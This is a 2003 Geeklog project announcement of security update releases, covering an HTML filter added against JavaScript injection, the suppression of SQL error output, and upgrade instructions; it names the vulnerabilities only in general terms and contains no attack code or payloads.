Geeklog 1.3.8-1sr1 and 1.3.7sr3 Security Updates
- Sunday, October 12 2003 @ 02:30 pm EDT
- Contributed by: Dirk
- Views: 11,490
In response to the recent reports about (confirmed and unconfirmed) security issues in Geeklog, we are releasing updates to Geeklog 1.3.8-1sr1 and 1.3.7sr3, addressing most of these issues (but not all - see below for details). There's also a complete 1.3.8-1sr1 tarball that should be used for fresh installs.
The upgrades include Ulf Harnhammar's kses HTML filter to address possible Javascript injections and CSS defacements.
As for the (still unconfirmed) SQL injections, the upgrades include a fix to the database class that does not display SQL errors in the browser any more (they are only logged in Geeklog's error.log). While this does not safe from SQL injection attempts, it does at least avoid disclosing any sensitive information as part of the error message.
Furthermore, we do not at this time recommend to use Geeklog with MySQL 4.1 (which, I may add, is still in alpha state and thus shouldn't be used on production sites anyway). An upcoming release of Geeklog will address the remaining SQL issues, including any problems with MySQL 4.1.
A few notes on upgrading: You only need to upload the files included in the upgrade archives to your site. Don't forget to change the path to config.php in the included lib-common.php. As for the config.php itself, you can either use the one included in the archives and change all your settings in there or you can simply copy over the two new variables, $_CONF['user_html'] and $_CONF['admin_html'], to your existing config.php. In the latter case, don't forget to change the version number (near the end of config.php), too.
You do not need to run the install script again.
Please make sure to pick the correct upgrade file for your installation. If you're running Geeklog 1.3.8-1, use the 1.3.8-1sr1 upgrade archive. If you're on Geeklog 1.3.8, you will need to upgrade to 1.3.8-1 first.
Users running on Geeklog 1.3.7sr2 should use the 1.3.7sr3 upgrade archive or use the complete 1.3.8-1sr1 tarball to upgrade to 1.3.8-1sr1 in one step.
In the unlikely event that anyone is still running on any version older than 1.3.7sr2, now would be a good time to upgrade ...
bye, Dirk